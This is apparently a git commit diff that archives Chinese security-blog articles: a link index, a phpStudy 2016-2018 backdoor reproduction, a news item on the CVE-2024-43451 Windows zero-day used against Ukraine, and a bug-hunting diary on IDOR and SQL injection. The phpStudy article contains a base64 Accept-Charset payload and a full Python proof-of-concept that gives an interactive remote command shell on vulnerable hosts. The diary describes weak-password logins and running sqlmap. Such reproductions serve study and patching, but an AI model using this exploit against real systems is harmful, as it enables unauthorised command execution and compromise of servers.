CVE-2024-25600:WordPress Bricks Builder RCE、phpstudy_2016-2018_rce 漏洞复现、【漏洞预警】易思智能物流无人值守系统SQL注入、记录日常挖掘漏洞、【安全圈】俄罗斯黑客利用文件拖放、删除操作触发 Windows 0day 漏洞攻击乌克兰目标、

This commit is contained in:
test 2024-11-16 20:10:38 +00:00
parent ba2b3ebec7
commit 13a2da2aa7
6 changed files with 356 additions and 4 deletions

View File

@ -58,5 +58,10 @@
"https://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486789&idx=1&sn=9e271a3346eed986ecc5b7a4aece7f88": "compiler explorer 轻松从汇编角度理解代码", "https://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486789&idx=1&sn=9e271a3346eed986ecc5b7a4aece7f88": "compiler explorer 轻松从汇编角度理解代码",
"https://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486789&idx=2&sn=f8617e893d02f1eaca70fb0f9661a3e3": "网太CMS漏洞复现", "https://mp.weixin.qq.com/s?__biz=MzkxNjMwNDUxNg==&mid=2247486789&idx=2&sn=f8617e893d02f1eaca70fb0f9661a3e3": "网太CMS漏洞复现",
"https://mp.weixin.qq.com/s?__biz=Mzg2NjY2MTI3Mg==&mid=2247497601&idx=1&sn=1b31fff83d5276667f7ead2ae5de2a6b": "微软2024年11月份于周二补丁日针对90漏洞发布安全补丁", "https://mp.weixin.qq.com/s?__biz=Mzg2NjY2MTI3Mg==&mid=2247497601&idx=1&sn=1b31fff83d5276667f7ead2ae5de2a6b": "微软2024年11月份于周二补丁日针对90漏洞发布安全补丁",
"https://mp.weixin.qq.com/s?__biz=Mzg2NjY2MTI3Mg==&mid=2247497601&idx=2&sn=413b3330c9fde967c520582aefbd4bd6": "2023年最易被利用的漏洞" "https://mp.weixin.qq.com/s?__biz=Mzg2NjY2MTI3Mg==&mid=2247497601&idx=2&sn=413b3330c9fde967c520582aefbd4bd6": "2023年最易被利用的漏洞",
} "https://mp.weixin.qq.com/s?__biz=MzAwMDQwNTE5MA==&mid=2650247657&idx=1&sn=b0600f03ef9bbffbcaa4fbf1fe0d87f7": "CVE-2024-25600WordPress Bricks Builder RCE",
"https://mp.weixin.qq.com/s?__biz=Mzk0MzI2NzQ5MA==&mid=2247486636&idx=1&sn=5d9cfbe6b8393b15c60b04ca9c2c9588": "phpstudy_2016-2018_rce 漏洞复现",
"https://mp.weixin.qq.com/s?__biz=MzIyNjk0ODYxMA==&mid=2247487499&idx=4&sn=69d6613ba3812956a0388203252d7a8f": "【漏洞预警】易思智能物流无人值守系统SQL注入",
"https://mp.weixin.qq.com/s?__biz=MzkxNzUxMjU5OQ==&mid=2247484847&idx=1&sn=ab525f7b54b1842379879fcb44279dfe": "记录日常挖掘漏洞",
"https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066024&idx=4&sn=46592438737abae8701b9ba1b7160d86": "【安全圈】俄罗斯黑客利用文件拖放、删除操作触发 Windows 0day 漏洞攻击乌克兰目标"
}

View File

@ -1,5 +1,5 @@
# CVE-2024-25600WordPress Bricks Builder RCE # CVE-2024-25600WordPress Bricks Builder RCE
原创 良夜 Timeline Sec 2024-11-15 19:03 白帽子 2024-11-16 16:14
> >
> 关注我们❤️,添加星标🌟,一起学安全!作者:良夜@Timeline Sec 本文字数3434阅读时长35mins声明仅供学习参考使用请勿用作违法用途否则后果自负 > 关注我们❤️,添加星标🌟,一起学安全!作者:良夜@Timeline Sec 本文字数3434阅读时长35mins声明仅供学习参考使用请勿用作违法用途否则后果自负

View File

@ -0,0 +1,164 @@
# phpstudy_2016-2018_rce 漏洞复现
Sword 网络安全学习爱好者 2024-11-16 10:41
# 漏洞描述
攻击者可以利用该漏洞执行PHP 命令,也可以称作 phpStudy 后门 。RCE(Remote Command|Code Execute)
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装无需配置即可直接安装使用一键搭建。
**其中2016、2018版本的phpstudy存在被黑客恶意篡改后形成的RCE漏洞**
。该漏洞可以直接远程执行系统命令。
# 影响版本
phpStudy 2016和2018两个版本
后门代码存在于\ext\php_xmlrpc.dll模块中
- phpStudy2016 查看
- \phpStudy\php\php-5.2.17\ext\php_xmlrpc.dll
- \phpStudy\php\php-5.4.45\ext\php_xmlrpc.dll
- phpStudy2018查看
- \phpStudy\PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
- \phpStudy\PHPTutorial\PHP\PHP-5.2.17\ext\php_xmlrpc.dll
# 漏洞分析
**网上某位大佬的**
通过 IDA分析xmlrpc.dll发现被植入危险函数eval()。
![](https://mmbiz.qpic.cn/mmbiz_png/ZAPxzic90CGBb636ckQ1MC08nniczShXsWbJ9urmgmhONqp2M8MJicLAmSGuiaarggseoSWur0IkR5fgLQ4xh4pb1Q/640?wx_fmt=png&from=appmsg "")
xmlrpc.dll中的初始化函数request_startup_func被篡改:当发起HTTP请求的数据包中包含“Accept-Encoding”字段时就会进入黑客自定义的攻击流程。
![](https://mmbiz.qpic.cn/mmbiz_png/ZAPxzic90CGBb636ckQ1MC08nniczShXsW6oVH5C2Bg2DncDXTI69eNwuUsUNgeygWxiax9ibncX6wPD1UAKrQfRyg/640?wx_fmt=png&from=appmsg "")
当Accept-Encoding字段的信息为“compress,gzip”时触发系统收集功能。
![](https://mmbiz.qpic.cn/mmbiz_png/ZAPxzic90CGBb636ckQ1MC08nniczShXsWL7JNEI6bnJheRcPdJ8pt8bBpSxTXN3QibZDYCOibgS9tDWIM7ehlc12w/640?wx_fmt=png&from=appmsg "")
当Accept-Encoding字段的信息为“gzip,deflate”时再进一步判断Accept-Charset字段只有当Accept-Charset字段为一些特定字符时才会触发漏洞。
# 漏洞复现
## 环境搭建
安装phpstudy2016或者phpstudy2018
**需要把PHP版本换成5.2.17或5.4.45版本**
![](https://mmbiz.qpic.cn/mmbiz_png/ZAPxzic90CGBb636ckQ1MC08nniczShXsW0icoBCfSpErFqnPibBiaZNDcSLGPWg7cb9fZL9qcn99Lqribew0rpNI5fQ/640?wx_fmt=png&from=appmsg "")
### 查看是否漏洞验证
- phpStudy2016查看
- \phpStudy\php\php-5.2.17\ext\php_xmlrpc.dll
- \phpStudy\php\php-5.4.45\ext\php_xmlrpc.dll
- phpStudy2018查看
- \phpStudy\PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll
- \phpStudy\PHPTutorial\PHP\PHP-5.2.17\ext\php_xmlrpc.dll
打开你phpstudy对应的文件查找@eval,文件存在@eval(%s(%s))证明漏洞存在
![](https://mmbiz.qpic.cn/mmbiz_png/ZAPxzic90CGBb636ckQ1MC08nniczShXsWdPAXxCicvcQLlrc5K8yScGwVoJNTUazexfwZ7WT24pZVAQIKGVbq3Zg/640?wx_fmt=png&from=appmsg "")
## 漏洞利用
### code1手工利用
使用burp抓包
添加请求头
Accept-Charset
值是想要执行的php代码
system('whoami');
代码需要进行base64编码
```
Accept-Charset: c3lzdGVtKCd3aG9hbWknKTs=
```
需要将
Accept-Encoding: gzip, deflate
修改为
Accept-Encoding: gzip,deflate
就是把中间的空格删掉
**(具体原因可以看上面大佬的漏洞分析)**
![](https://mmbiz.qpic.cn/mmbiz_png/ZAPxzic90CGBb636ckQ1MC08nniczShXsWrmX4X5xlTSWc5OXia0pXPuKA8cBZxZFayT1q4QXdKGDvgVChKrQGYnw/640?wx_fmt=png&from=appmsg "")
重放请求包
![](https://mmbiz.qpic.cn/mmbiz_png/ZAPxzic90CGBb636ckQ1MC08nniczShXsWGcrpibMTz1C2UxDoqib20CoicshibJlicBeVwx5eLfxSCDR3h0cntnK9Vrw/640?wx_fmt=png&from=appmsg "")
### code2POC脚本
**来源于GitHub**
```
# phpStudy_2016-2018_RCE_POC.py
import requests
import base64
import string
import random
from time import sleep
#向目标提交请求,漏洞触发。
def rce(url,cmd):
cmd = base64.b64encode("system('{}');".format(cmd).encode()).decode()
headers = {
'Accept-Charset': cmd,#请求头中提交参数,触发漏洞。
'Accept-Encoding':'gzip,deflate',#请求头中提交参数,触发漏洞。
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 OPR/73.0.3856.284'
} #浏览器指纹
res = requests.get(url = url ,headers=headers)
print(res.status_code)
if res.status_code == 200: #判断是否能与目标正常通信
bof = 0
eof = res.content.index(b"<!DOCTYPE html") #将回复内容转化为二进制字符
k = (res.content[bof:eof].decode("gbk"))
return k
else:
exit("error url!")
# 生成随机数与目标返回的字符对比,判断目标是否在线。
def judge():
j = ''
for i in range(18):
j +=random.choice(string.digits + string.ascii_letters)
return j
#初始化
def main(url):
flag1 = judge()
cmd = "echo " + flag1
flag2 = rce(url, cmd)
if flag1 in flag2 :
print("[+] Target is enable!")
while True:
cmd = input("[*] cmd >")
if cmd == "q" or cmd == "":
break
print(rce(url, cmd))
else:
print("[+] Target is not enable! exit 3s later")
sleep(3)
exit()
if __name__ == "__main__":
url = input("Enter an url ")
print("[+] Testing url:{}".format(url))
print('-----------------')
main(url)
```
****```
```
![](https://mmbiz.qpic.cn/mmbiz_png/ZAPxzic90CGBb636ckQ1MC08nniczShXsWhwzrKCAibPA8vsjBaPOe9Sm1Nu6Af9fl4KR0DkP1qmVibaBdleQGUIWw/640?wx_fmt=png&from=appmsg "")
# 修复建议
下载phpxmlrpc.rar 解压 复制文件
- php\php-5.2.17\ext\php_xmlrpc.dll
- php\php-5.4.45\ext\php_xmlrpc.dll
覆盖原路径文件即可。
## 复现环境所需安装包以及工具公众回复phpstudy16+18获取

View File

@ -0,0 +1,122 @@
# 【安全圈】俄罗斯黑客利用文件拖放、删除操作触发 Windows 0day 漏洞攻击乌克兰目标
安全圈 2024-11-16 06:34
![](https://mmbiz.qpic.cn/sz_mmbiz_png/aBHpjnrGylgOvEXHviaXu1fO2nLov9bZ055v7s8F6w1DD1I0bx2h3zaOx0Mibd5CngBwwj2nTeEbupw7xpBsx27Q/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")
**关键词**
漏洞
网络安全公司 
ClearSky
 警告称Windows 中一个新修补的
day
漏洞
可通过用户最少的交互(例如删除文件或右键单击文件)被利用。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/aBHpjnrGylgH2Vr9Yiaclr72VvEAKak13ZIZNFszYmlxUWJxSuevtyViaKzDhNVSiaRzruCb8GfZN2kqvPp3L0ncg/640?wx_fmt=png&from=appmsg "")
该0day漏洞编号为 CVE-2024-43451是一个中等严重程度的漏洞会影响 MSHTM 引擎,该引擎继续由 Internet Explorer 模式下的 Edge 和其他应用程序通过 WebBrowser 控件使用,从而使它们暴露于困扰该组件的任何安全缺陷。
成功利用 CVE-2024-43451 允许威胁组织窃取受害者的 NTLMv2 哈希,然后通过执行传递哈希攻击使用它来作为目标用户进行身份验证。
微软在 11 月 12 日的安全公告https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-43451中指出“用户与恶意文件进行最小程度的交互例如选择单击、检查右键单击或执行除打开或执行之外的操作都可能触发此漏洞。”
ClearSky 发现了该漏洞并于 2024 年 6 月向微软报告,据该公司称,一些看似无害的操作可能会触发隐藏在 URL 文件中的漏洞,包括删除文件和将文件拖放到另一个文件夹。
ClearSky 观察到 CVE-2024-43451 被疑似俄罗斯黑客在针对乌克兰实体的攻击中利用。
受害者会收到来自受感染的乌克兰政府服务器的钓鱼电子邮件,提示他们更新学历证书。这些电子邮件将受害者引导至从政府官方网站下载的恶意 ZIP 文件。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/aBHpjnrGylgH2Vr9Yiaclr72VvEAKak13Um1oS0ydhouUJA3QsicOUMZ8Y0siazMcvwbq8GRqOUian2tGCwowyLNFg/640?wx_fmt=png&from=appmsg "")
该档案包含两个文件——一个 PDF 文档和一个 URL 文件——针对两个已知漏洞,即 CVE-2023-320462 和 CVE-2023-360251。该 URL 指向外部服务器以获取两个可执行文件也旨在利用新披露的0day漏洞。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/aBHpjnrGylgH2Vr9Yiaclr72VvEAKak130WTTHYeaXPDMVn7xRLnPibCqMRqTpwmhgnKcHaM7ewsoZkhnlnibwv6Q/640?wx_fmt=png&from=appmsg "")
ClearSky 在一份技术报告中解释道:“当用户通过右键单击、删除或移动 URL 文件与它交互时,漏洞就会被触发。此操作会与攻击者的服务器建立连接并下载更多恶意文件,包括 SparkRAT 恶意软件。”
![](https://mmbiz.qpic.cn/sz_mmbiz_png/aBHpjnrGylgH2Vr9Yiaclr72VvEAKak13wqwSeM3HbwKQWT4C2TSxZMDKkvkSxRMGPphTCoticjertucoviciaMhfQ/640?wx_fmt=png&from=appmsg "")
攻击链
该网络安全公司表示,在 Windows 10 和 Windows 11 上URL 文件在执行任何这些操作时都会立即与外部服务器建立通信。在 Windows 7、8 和 8.1 上,该漏洞仅在多次尝试后才会触发。
ClearSky 表示,这表明“新发现的漏洞在 Windows 10/11 操作系统上更容易被利用”。
乌克兰计算机应急响应小组 (CERT-UA) 称CVE-2024-43451 已被追踪为 UAC-0194 的威胁组织利用为0day漏洞该威胁组织疑似来自俄罗斯。据 ClearSky 称,攻击者使用了与其他团体常见的工具包和技术。
  END  
阅读推荐
[【安全圈】打补丁要快0Day漏洞正在被黑客广泛利用](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652065974&idx=1&sn=d6789e893634a0f2fb9c34b2bfb0a8f9&chksm=f36e7cf6c419f5e0cf5388d52919823df63584452d66f1079566f5e2b4f9dbbebf6cd788ff74&scene=21#wechat_redirect)
[【安全圈】朝鲜黑客创建经过安全验证的恶意软件攻击macOS系统](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652065974&idx=2&sn=010755f0a25a61fd86bd0766d523950f&chksm=f36e7cf6c419f5e0c46265072c96b8a08d4d6bbc94045690bcffab55bb5671a022709a21205e&scene=21#wechat_redirect)
[【安全圈】黑客声称近5亿Instagram用户的数据被抓取](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652065974&idx=3&sn=8561949d0e269ce6c32fac5e2e36b663&chksm=f36e7cf6c419f5e04e3e14cf54a64911a3e530eb7482e1f6d1c3a65638b274b8547ce6234741&scene=21#wechat_redirect)
[【安全圈】研究人员警告 AI 图像生成模型可能会泄露敏感指令](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652065974&idx=4&sn=22b17e04546da474a95971cd15506efa&chksm=f36e7cf6c419f5e09e31d108e4344afc1def30835bb8a778009442c8d7e9b125865f3ea81db1&scene=21#wechat_redirect)
![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEft6M27yliapIdNjlcdMaZ4UR4XxnQprGlCg8NH2Hz5Oib5aPIOiaqUicDQ/640?wx_fmt=gif "")
![](https://mmbiz.qpic.cn/mmbiz_png/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEDQIyPYpjfp0XDaaKjeaU6YdFae1iagIvFmFb4djeiahnUy2jBnxkMbaw/640?wx_fmt=png "")
**安全圈**
![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEft6M27yliapIdNjlcdMaZ4UR4XxnQprGlCg8NH2Hz5Oib5aPIOiaqUicDQ/640?wx_fmt=gif "")
←扫码关注我们
**网罗圈内热点 专注网络安全**
**实时资讯一手掌握!**
![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCE3vpzhuku5s1qibibQjHnY68iciaIGB4zYw1Zbl05GQ3H4hadeLdBpQ9wEA/640?wx_fmt=gif "")
**好看你就分享 有用就点个赞**
**支持「****安全圈」就点个三连吧!**
![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCE3vpzhuku5s1qibibQjHnY68iciaIGB4zYw1Zbl05GQ3H4hadeLdBpQ9wEA/640?wx_fmt=gif "")

View File

@ -1,5 +1,5 @@
# 【漏洞预警】易思智能物流无人值守系统SQL注入 # 【漏洞预警】易思智能物流无人值守系统SQL注入
thelostworld 2024-11-15 20:24 thelostworld 2024-11-16 09:10
免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!马赛克安全实验室情报申明(可点击查看) 免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!马赛克安全实验室情报申明(可点击查看)
![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68f5ycicia6CCgOhrqkvHfLj5ajt2SKLnWoZSh219zUS3eTcERBwhxu9Dg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "") ![](https://mmbiz.qpic.cn/mmbiz_png/wibiaOls7McRicPjtibQUDC6OnlQyWCzfd68f5ycicia6CCgOhrqkvHfLj5ajt2SKLnWoZSh219zUS3eTcERBwhxu9Dg/640?wx_fmt=other&from=appmsg&wxfrom=5&wx_lazy=1&wx_co=1&tp=webp "")

View File

@ -0,0 +1,61 @@
# 记录日常挖掘漏洞
原创 莫大130 安全逐梦人 2024-11-16 08:04
> 记录在日常挖掘漏洞发现过程,没有多少技术含量,分享出来就当作记录自己学习经历
## 越权漏洞
一般这种就是一个登录页面,但是有注册功能,我们直接注册用户,不然就一个登录页面很难发现什么漏洞的,有账户
多功能点测试
![](https://mmbiz.qpic.cn/sz_mmbiz_png/vOGOib9z4Wz7MIGicInJgySA74JBahDDvP8gEfJvm6NhIW2rboqYpiaRVKEz0QrcQdAqBHFX9OjwM2wV1w1UD6Y3w/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/vOGOib9z4Wz7MIGicInJgySA74JBahDDvPRpGk8oSJHjPQTLg5XZmmRPNZ6Oq3rlZUicVCUxDd53jNyNlt517PkicA/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/vOGOib9z4Wz7MIGicInJgySA74JBahDDvPe8kGw0EG77B5FnuQ5o7ajazHVETJxDJFSSGf02bicxbpfTaW3uPL02Q/640?wx_fmt=png&from=appmsg "")
注册成功后登录完善个人信息过程并观察yakit数据量流量在一条数据包中发现了query参数后面的数字我们简单使用yakit fuzz功能![](https://mmbiz.qpic.cn/sz_mmbiz_png/vOGOib9z4Wz7MIGicInJgySA74JBahDDvPM4KOwPnlEdyIc7LFPlqJWRVBaqQQta3fzOXp1orwwzlMRmu0UzIicUg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/vOGOib9z4Wz7MIGicInJgySA74JBahDDvPVMgUv7qmPPWfJhUyNkEo24pibLhorr4ljTibV4d8L3h4VKWClBI3GibYw/640?wx_fmt=png&from=appmsg "")
可以看到遍历1000个id请求返回了数据
![](https://mmbiz.qpic.cn/sz_mmbiz_png/vOGOib9z4Wz7MIGicInJgySA74JBahDDvPibJ5qTMxRU0y6jVBP8PSXknwpLa8LquKcQ0cw5O0ib3IviaR60392f3pw/640?wx_fmt=png&from=appmsg "")
## sql注入
这个漏洞发现也是观察数据包,通过弱口令登录后台,在页面中点点,对数据包中的参数测试
![](https://mmbiz.qpic.cn/sz_mmbiz_png/vOGOib9z4Wz7MIGicInJgySA74JBahDDvPQu9QicsiaakkHsGxFEg9Ipt08dUUKbl1IqwJI6mdm9tnJy1xqVq8xhSw/640?wx_fmt=png&from=appmsg "")
## wsdl接口测试发现sql注入
通过字典扫描出来 Service1.svc?wsdl并使用BURP插件Wsdler 获取接口的参数测试
![](https://mmbiz.qpic.cn/sz_mmbiz_png/vOGOib9z4Wz7MIGicInJgySA74JBahDDvPiaeWk6u6JMUJMywxib19xO8bEttOBIg9MaJqvjoicHClNshaVArjGv7tg/640?wx_fmt=png&from=appmsg "")
使用Wsdler插件获取接口
![](https://mmbiz.qpic.cn/sz_mmbiz_png/vOGOib9z4Wz7MIGicInJgySA74JBahDDvPcAv1z1ryA5icCYQTy1PQ7yNqGu6xRwF8otgSz6VjdSuaKJrPzIPJnvA/640?wx_fmt=png&from=appmsg "")
获取到接口,我们对每个接口单个进行测试
![](https://mmbiz.qpic.cn/sz_mmbiz_png/vOGOib9z4Wz7MIGicInJgySA74JBahDDvPiaic9cbYkrcadNZKSrhHsPxGRswGr6mKliatGg5cjYAicQkIEZciaehpKgw/640?wx_fmt=png&from=appmsg "")
通过单引号来测试 1',发现加 ' 和不加  ' 返回页面不一样
![](https://mmbiz.qpic.cn/sz_mmbiz_png/vOGOib9z4Wz7MIGicInJgySA74JBahDDvPoZBAlhKwD0JOXfkichg7LMmSw8Bv8NoDcSibUMQg7vYK6cFFmYLQzdPg/640?wx_fmt=png&from=appmsg "")
![](https://mmbiz.qpic.cn/sz_mmbiz_png/vOGOib9z4Wz7MIGicInJgySA74JBahDDvPSWzyRzibYBW7n9wDsSaZ726icjfubsOVQkRqMiac7IpUXzibdy4VDFRmFA/640?wx_fmt=png&from=appmsg "")
直接将数据包放到sqlmap跑。
![](https://mmbiz.qpic.cn/sz_mmbiz_png/vOGOib9z4Wz7MIGicInJgySA74JBahDDvPRpia9Iv5pZXlJYF8TWOia31hR1J2IW5dBceceVqSJia88W697IaatlKyg/640?wx_fmt=png&from=appmsg "")
附上微信群,交流技术和划水聊天等,可回复 加群  或者扫描下面二维码,添加我好友拉进群。
![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/vOGOib9z4Wz6AFk7e7MxpFibX5XlQNPicd50DlW0g9xdzpQm1Vf8fVYyEDbzGaomiaIT5ya2Ntafia8Vwr2WpImciafg/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "")